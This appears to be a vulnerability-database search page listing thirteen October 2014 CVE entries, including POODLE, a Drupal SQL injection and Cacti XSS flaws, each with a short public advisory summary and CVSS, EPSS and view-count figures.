Lucene search

K

13 matches found

CVE
CVE
added 2014/10/15 12:55 a.m.842 views

CVE-2014-3566

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.

4.3CVSS4.4AI score0.9413EPSS
CVE
CVE
added 2014/10/16 12:55 a.m.241 views

CVE-2014-3704

The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.

7.5CVSS7AI score0.9432EPSS
CVE
CVE
added 2014/10/07 2:55 p.m.104 views

CVE-2014-7204

jscript.c in Exuberant Ctags 5.8 allows remote attackers to cause a denial of service (infinite loop and CPU and disk consumption) via a crafted JavaScript file.

5CVSS6.2AI score0.03198EPSS
CVE
CVE
added 2014/10/06 2:55 p.m.90 views

CVE-2014-6054

The rfbProcessClientNormalMessage function in libvncserver/rfbserver.c in LibVNCServer 0.9.9 and earlier allows remote attackers to cause a denial of service (divide-by-zero error and server crash) via a zero value in the scaling factor in a (1) PalmVNCSetScaleFactor or (2) SetScale message.

4.3CVSS7.8AI score0.43841EPSS
CVE
CVE
added 2014/10/20 5:55 p.m.82 views

CVE-2014-3564

Multiple heap-based buffer overflows in the status_handler function in (1) engine-gpgsm.c and (2) engine-uiserver.c in GPGME before 1.5.1 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to "different line lengths in a specific orde...

6.8CVSS7.6AI score0.03193EPSS
CVE
CVE
added 2014/10/10 1:55 a.m.80 views

CVE-2014-5270

Libgcrypt before 1.5.4, as used in GnuPG and other products, does not properly perform ciphertext normalization and ciphertext randomization, which makes it easier for physically proximate attackers to conduct key-extraction attacks by leveraging the ability to collect voltage data from exposed met...

2.1CVSS5.6AI score0.00108EPSS
CVE
CVE
added 2014/10/29 10:55 a.m.78 views

CVE-2014-3694

The (1) bundled GnuTLS SSL/TLS plugin and the (2) bundled OpenSSL SSL/TLS plugin in libpurple in Pidgin before 2.10.10 do not properly consider the Basic Constraints extension during verification of X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and o...

6.4CVSS8.5AI score0.01448EPSS
CVE
CVE
added 2014/10/16 12:55 a.m.75 views

CVE-2014-3686

wpa_supplicant and hostapd 0.7.2 through 2.2, when running with certain configurations and using wpa_cli or hostapd_cli with action scripts, allows remote attackers to execute arbitrary commands via a crafted frame.

6.8CVSS6AI score0.04511EPSS
CVE
CVE
added 2014/10/15 2:55 p.m.74 views

CVE-2014-1829

Requests (aka python-requests) before 2.3.0 allows remote servers to obtain a netrc password by reading the Authorization header in a redirected request.

5CVSS6.4AI score0.00495EPSS
CVE
CVE
added 2014/10/02 2:55 p.m.61 views

CVE-2014-7155

The x86_emulate function in arch/x86/x86_emulate/x86_emulate.c in Xen 4.4.x and earlier does not properly check supervisor mode permissions, which allows local HVM users to cause a denial of service (guest crash) or gain guest kernel mode privileges via vectors involving an (1) HLT, (2) LGDT, (3) L...

5.8CVSS3.7AI score0.00782EPSS
CVE
CVE
added 2014/10/20 5:55 p.m.60 views

CVE-2014-5025

Cross-site scripting (XSS) vulnerability in data_sources.php in Cacti 0.8.8b allows remote authenticated users with console access to inject arbitrary web script or HTML via the name_cache parameter in a ds_edit action.

3.5CVSS6.8AI score0.00453EPSS
CVE
CVE
added 2014/10/20 5:55 p.m.59 views

CVE-2014-5026

Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b allow remote authenticated users with console access to inject arbitrary web script or HTML via a (1) Graph Tree Title in a delete or (2) edit action; (3) CDEF Name, (4) Data Input Method Name, or (5) Host Templates Name in a delet...

3.5CVSS7.2AI score0.00347EPSS
CVE
CVE
added 2014/10/02 2:55 p.m.59 views

CVE-2014-7154

Race condition in HVMOP_track_dirty_vram in Xen 4.0.0 through 4.4.x does not ensure possession of the guarding lock for dirty video RAM tracking, which allows certain local guest domains to cause a denial of service via unspecified vectors.

6.1CVSS5.9AI score0.00905EPSS